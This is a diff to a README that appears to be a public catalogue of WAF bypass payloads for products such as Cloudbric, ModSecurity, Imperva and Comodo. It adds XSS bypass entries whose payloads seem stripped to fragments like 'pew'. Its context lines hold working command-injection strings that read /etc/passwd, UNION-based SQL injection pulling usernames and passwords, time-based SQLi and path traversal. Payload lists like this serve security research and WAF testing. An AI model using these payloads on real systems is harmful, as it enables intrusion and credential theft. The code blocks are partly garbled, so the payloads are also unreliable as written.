diff --git a/README.md b/README.md index 3368edb..00389d1 100644 --- a/README.md +++ b/README.md @@ -3377,6 +3377,12 @@ cat$u+/etc$u/passwd$u ";cat+/etc/passwd+# ``` +### Cloudbric +- [XSS Bypass](https://twitter.com/0xInfection/status/1212331839743873026) by [@0xInfection](https://twitter.com/0xinfection) +``` +pew +``` + ### Comodo - XSS Bypass by [@0xInfection](https://twitter.com/0xinfection) ``` @@ -3435,6 +3441,7 @@ Keep-Alive: 300 ```

alert dragme +click ``` - GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741) ``` @@ -3544,6 +3551,10 @@ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ ``` ### ModSecurity +- [XSS Bypass for CRS 3.2](https://twitter.com/brutelogic/status/1209086328383660033) by [@brutelogic](https://twitter.com/brutelogic) +``` + +```` - [RCE Payloads Detection Bypass for PL3](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle) (v3.1) ``` ;+$u+cat+/etc$u/passwd$u @@ -3594,6 +3605,10 @@ amUserId=1 union select username,password,3,4 from users ``` ### Imperva +- [XSS Bypass](https://twitter.com/0xInfection/status/1212331839743873026) by [@0xInfection](https://twitter.com/0xinfection) +``` +pew +``` - [XSS Bypass](https://twitter.com/_ugurercan/status/1188406765735632896) by [@ugurercan](https://twitter.com/_ugurercan) ```

@@ -3695,6 +3710,10 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>" +``` - [Smuggling RCE Payloads](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle) ``` /???/??t+/???/??ss?? @@ -3769,6 +3788,7 @@ http://host.com/test.asp?file=.%./bla.txt - XSS Bypass by [@brute Logic](https://twitter.com/brutelogic) ``` + ``` - XSS Bypass by [@0xInfection](https://twitter.com/0xInfection) ```